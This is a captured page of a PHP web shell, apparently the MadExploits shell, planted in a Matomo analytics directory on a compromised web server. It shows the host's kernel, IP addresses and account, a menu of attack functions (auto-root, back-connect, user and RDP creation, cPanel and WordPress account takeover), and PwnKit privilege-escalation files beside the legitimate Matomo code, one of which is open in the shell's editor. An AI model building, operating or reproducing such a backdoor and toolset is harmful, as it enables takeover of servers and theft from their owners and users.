Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.226.93.177
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
analytics /
core /
Db /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
Adapter
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
Schema
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
Adapter.php
4.74
KB
-rw-r--r--
AdapterInterface.php
1.31
KB
-rw-r--r--
BatchInsert.php
11.24
KB
-rw-r--r--
Schema.php
4.78
KB
-rw-r--r--
SchemaInterface.php
2.45
KB
-rw-r--r--
Settings.php
872
B
-rw-r--r--
TransactionLevel.php
2.99
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : AdapterInterface.php
<?php /** * Matomo - free/libre analytics platform * * @link https://matomo.org * @license http://www.gnu.org/licenses/gpl-3.0.html GPL v3 or later * */ namespace Piwik\Db; use Exception; /** */ interface AdapterInterface { /** * Reset the configuration variables in this adapter. */ public function resetConfig(); /** * Return default port. * * @return int */ public static function getDefaultPort(); /** * Check database server version * * @throws Exception if database version is less than required version */ public function checkServerVersion(); /** * Returns true if this adapter's required extensions are enabled * * @return bool */ public static function isEnabled(); /** * Returns true if this adapter supports blobs as fields * * @return bool */ public function hasBlobDataType(); /** * Returns true if this adapter supports bulk loading * * @return bool */ public function hasBulkLoader(); /** * Test error number * * @param Exception $e * @param string $errno * @return bool */ public function isErrNo($e, $errno); /** * Is the connection character set equal to utf8? * * @return bool */ }
Close